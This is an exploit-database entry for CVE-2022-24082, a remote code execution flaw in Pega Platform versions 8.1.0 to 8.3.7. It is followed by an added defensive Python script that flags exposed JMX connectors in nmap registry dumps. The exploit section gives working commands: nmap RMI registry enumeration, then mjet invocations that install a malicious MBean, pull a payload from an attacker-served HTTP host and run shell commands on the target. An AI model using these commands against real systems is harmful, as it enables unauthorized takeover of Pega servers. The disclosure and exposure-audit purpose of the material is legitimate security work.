
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"

;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316

Kind Regards,
Marcin Wolak
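The advisory's point that the registry advertises the JMX connector as @127.0.0.1:<PORT> while the port can still listen network-wide is what a defender needs to check on their own hosts; the exposure audit below is an added example, not part of the advisory or the mjet toolkit. The nmap output is constructed, and the regexes assume the indentation nmap's rmi-dumpregistry script uses for binding names, stub classes and endpoints.

```python
import re

# Constructed sample of `nmap --script rmi-dumpregistry` output, modelled on the
# "@127.0.0.1:<PORT>" form the advisory describes; it is not a real capture.
SAMPLE_NMAP_OUTPUT = """\
9999/tcp open  java-rmi Java RMI
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.0.1:44381
|     extends
|   appService
|     com.example.AppService_Stub
|     @10.0.0.5:41002
|_
"""

JMX_STUB = "javax.management.remote.rmi.RMIServerImpl_Stub"
NAME_RE = re.compile(r"^\|   (\S+)$")                   # registry binding name
CLASS_RE = re.compile(r"^\|     ([\w.$]+)$")             # first class line = stub class
ENDPOINT_RE = re.compile(r"^\|     @([\w.:\-]+):(\d+)$")  # advertised host:port

def parse_registry_dump(text):
    """Return one dict per registry binding: name, stub class, advertised host/port."""
    bindings, current = [], None
    for line in text.splitlines():
        if m := NAME_RE.match(line):
            current = {"name": m.group(1), "stub_class": None, "host": None, "port": None}
            bindings.append(current)
        elif current and (m := ENDPOINT_RE.match(line)):
            current["host"], current["port"] = m.group(1), int(m.group(2))
        elif current and current["stub_class"] is None and (m := CLASS_RE.match(line)):
            current["stub_class"] = m.group(1)  # later lines ("extends", parents) are skipped
    return bindings

def audit_jmx_exposure(text):
    """Flag JMX connector stubs. A loopback address in the stub does not prove the
    dynamic port is bound to loopback (the advisory notes it may listen network-wide),
    so every loopback-advertised JMX port must still be port-scanned from the network."""
    findings = []
    for b in parse_registry_dump(text):
        if b["stub_class"] != JMX_STUB:
            continue
        host = b["host"] or ""
        loopback = host == "localhost" or host.startswith("127.") or host == "::1"
        findings.append((b["name"], host, b["port"],
                         "verify externally: advertised on loopback but may listen on all interfaces"
                         if loopback else "JMX connector exposed: require authentication or firewall it"))
    return findings
```

A finding tagged "verify externally" is the case this advisory describes: follow it up with the `nmap -p <PORT>` check from outside the host, and treat a reachable, unauthenticated JMX connector as remote code execution exposure.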